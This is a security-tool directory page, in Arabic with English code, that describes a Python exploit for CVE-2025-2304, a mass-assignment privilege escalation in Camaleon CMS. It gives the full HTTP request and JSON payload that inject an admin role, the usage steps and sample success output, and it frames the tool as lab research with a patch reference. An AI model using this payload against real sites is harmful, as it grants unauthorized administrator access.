Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2304-exploit — نص استغلال Python لـ CVE-2025-2304، وهو تصعيد امتيازات تعيين جماعي في Camaleon CMS. يقوم بأتمتة تحليل رمز CSRF وحقن معلمة الدور لرفع المستخدمين المصادق عليهم إلى مسؤول في بيئات معملية خاضعة للرقابة. | Kitploit
أدوات/GitHubGitHub/jeanback1/cve-2025-2304-exploit
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
jeanback1/cve-2025-2304-exploit

CVE-2025-2304-exploit

نص استغلال Python لـ CVE-2025-2304، وهو تصعيد امتيازات تعيين جماعي في Camaleon CMS. يقوم بأتمتة تحليل رمز CSRF وحقن معلمة الدور لرفع المستخدمين المصادق عليهم إلى مسؤول في بيئات معملية خاضعة للرقابة.

عرض المستودع
42منذ 4 أشهرلم تتم المراجعة بعد

CVE-2025-2304 - Camaleon CMS Mass Assignment Privilege Escalation

📌 وصف المشروع

CVE-2025-2304 هي ثغرة Mass Assignment في Camaleon CMS (الإصدارات الأقدم من 2.9.1) تسمح لمستخدمٍ مُوثّق برفع صلاحياته إلى مسؤول (admin) عبر التلاعب بمعامل role في طلبات تغيير كلمة المرور.

Python 3.x License Security Status

🚨 الشرح الفني للثغرة

سياق الثغرة

يستخدم Camaleon CMS إطار العمل Ruby on Rails، وفي الإصدار 2.9.0 توجد ثغرة Mass Assignment في المتحكم UsersController#updated_ajax. يستخدم المتحكم .permit! دون قيود، مما يسمح بأي معامل يُرسَل في الطلب ليتم إسناده مباشرة إلى نموذج المستخدم.

ناقل الهجوم

  1. الوصلة القابلة للاستغلال: POST /admin/users/{user_id}/updated_ajax
  2. المعامل الحرج: password[role] المُرسَل داخل نطاق password
  3. الآلية: يعالج المتحكم params.require(:password) ثم يطبق .permit! الذي لا يفلتر أي معاملات
  4. النتيجة: حقن القيمة "admin" في حقل role الخاص بالمستخدم

التدفق التقني

root@kitploit:~
POST /admin/users/3/updated_ajax
Content-Type: application/x-www-form-urlencoded

authenticity_token=[TOKEN]&
password[password]=new_password&
password[password_confirmation]=new_password&
password[role]=admin&
password[id]=3&
_method=patch

تتم معالجة المعامل password[role] بواسطة User.update(permitted_params) ويُسنَد مباشرة إلى سجل المستخدم بسبب .permit!، مما يرفع الصلاحيات من user إلى admin.

⚡ التثبيت والاستخدام

المتطلبات الأساسية

root@kitploit:~
# Python 3.6+
python3 --version

# المكتبات المطلوبة
pip install requests

تشغيل السكربت

النسخة الإنجليزية:

root@kitploit:~
python3 exploit_cve_2025_2304_en.py

النسخة الإسبانية:

root@kitploit:~
python3 exploit_cve_2025_2304.py

المدخلات المطلوبة

سيطلب السكربت تفاعليًا:

  1. رابط الخادم الأساسي: http(s)://domain:port
  2. معرّف المستخدم: معرّف المستخدم المهاجِم
  3. كوكي الجلسة: قيمة _cms_session (يتم الحصول عليها بعد تسجيل الدخول)
  4. كلمة المرور الجديدة: اختياري (الافتراضي: P@ssw0rd_lab_2025!)

مثال لأمر كامل

root@kitploit:~
python3 exploit_cve_2025_2304_en.py
root@kitploit:~
[?] Base URL of the server (ex: http://localhost:3000) : http://192.168.1.100:8080
[?] User ID of the attacker user (ex: 3) : 5
[?] Session cookie (_cms_session=VALUE) : _cms_session=abc123def456

🔧 عن هذا السكربت

لماذا بنيته؟

عندما اكتشفت هذه الثغرة، كان أول ما فعلته هو اختبارها يدويًا عبر Burp Suite — وقد نجحت. لكنني أردت أن أخطو خطوة إضافية وأن أحوّل تلك العملية اليدوية إلى شيء قابل للتكرار والنقل، فكتبت هذا السكربت. إلى جانب مجرد استغلال الثغرة، فإن بناء هذا السكربت أتاح لي فرصة العمل على بعض الأمور التي أجدها ممتعة حقًا:

  • أتمتة تدفقات HTTP متعددة الخطوات مع إدارة الجلسة
  • تحليل رموز CSRF ديناميكيًا من الاستجابات المباشرة
  • التعامل مع استجابات JSON/HTML غير المتسقة من نفس الوصلة
  • معرفة اللحظة التي ينجح فيها الاستغلال — واللحظة التي لا ينجح فيها

لا أحاول استبدال Burp أو Caido. فهذه الأدوات لا غنى عنها في الاختبار التفاعلي. هذا فقط ما يحدث عندما أفضّل كتابة سكربت على تكرار نفسي.

⚠️ إخلاء المسؤولية والاعتبارات الأخلاقية

تحذير قانوني مهم

root@kitploit:~
THIS SCRIPT IS EXCLUSIVELY FOR:
- Controlled laboratory environments
- Systems you own or have explicit authorization to test
- Educational purposes and authorized research

STRICTLY PROHIBITED:
- Use on systems without authorization
- Application with malicious intent
- Violation of data protection laws
- Compromising third-party security

The author is not responsible for misuse of this tool.

📊 لقطات مثال

تنفيذ ناجح

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║        CVE-2025-2304 │ Camaleon CMS Mass Assignment          ║
║        Privilege Escalation: user → admin                    ║
║        [LABORATORY / CONTROLLED ENVIRONMENT]                 ║
╚══════════════════════════════════════════════════════════════╝

[✔] CSRF token obtained: abc123def456...
[✔] EXPLOIT SUCCESSFUL: Server confirmed the update.
[✔] Status : COMPROMISED
   User 5 should now have 'admin' role.

بنية الحمولة

root@kitploit:~
{
    "authenticity_token": "abcd1234",
    "password[password]": "P@ssw0rd_lab_2025!",
    "password[password_confirmation]": "P@ssw0rd_lab_2025!",
    "password[role]": "admin",
    "password[id]": "5",
    "_method": "patch"
}

🛠 خارطة الطريق والتحسينات المستقبلية

التحسينات المخطط لها

  1. أتمتة تسجيل الدخول: تكامل للحصول على الجلسة تلقائيًا
  2. كشف الإصدار: سكربت لبصمة الإصدار وتأكيد النسخة القابلة للاستغلال
  3. وضع verbose/quiet لإخراج أنظف في خطوط الأتمتة
  4. اختبار جماعي: القدرة على اختبار عدة مستخدمين/روابط في وقت واحد
  5. تقرير مُولَّد: تصدير النتائج بصيغة JSON/HTML

قابلية التوسع

الكود مبني بنمط معياري لتسهيل:

  • التكيف مع ثغرات Mass Assignment أخرى
  • التكامل مع أُطر الاختبارات الاختراقية
  • إضافة ميزات التسجيل والمراقبة

📚 المراجع والمصادر

  • CVE الرسمي: CVE-2025-2304
  • Camaleon CMS: المستودع الرسمي
  • التصحيح: الإصدار 2.9.1 يصلح استخدام .permit!
  • توثيق Rails: Strong Parameters

🤝 المساهمات

نرحب بالمساهمات التي:

  1. تحسّن كشف حالة نجاح الاستغلال
  2. تضيف وظائف مع الحفاظ على التركيز الأخلاقي
  3. تصلح الأخطاء أو تحسّن معالجة الأخطاء
  4. توثّق حالات استخدام إضافية

تذكّر: هذا المشروع مخصص حصريًا للأغراض التعليمية والبحث المصرّح به.


آخر تحديث: أبريل 2025 | بقلم محلل أمني (بيئة مختبرية)

تنزيل الأداة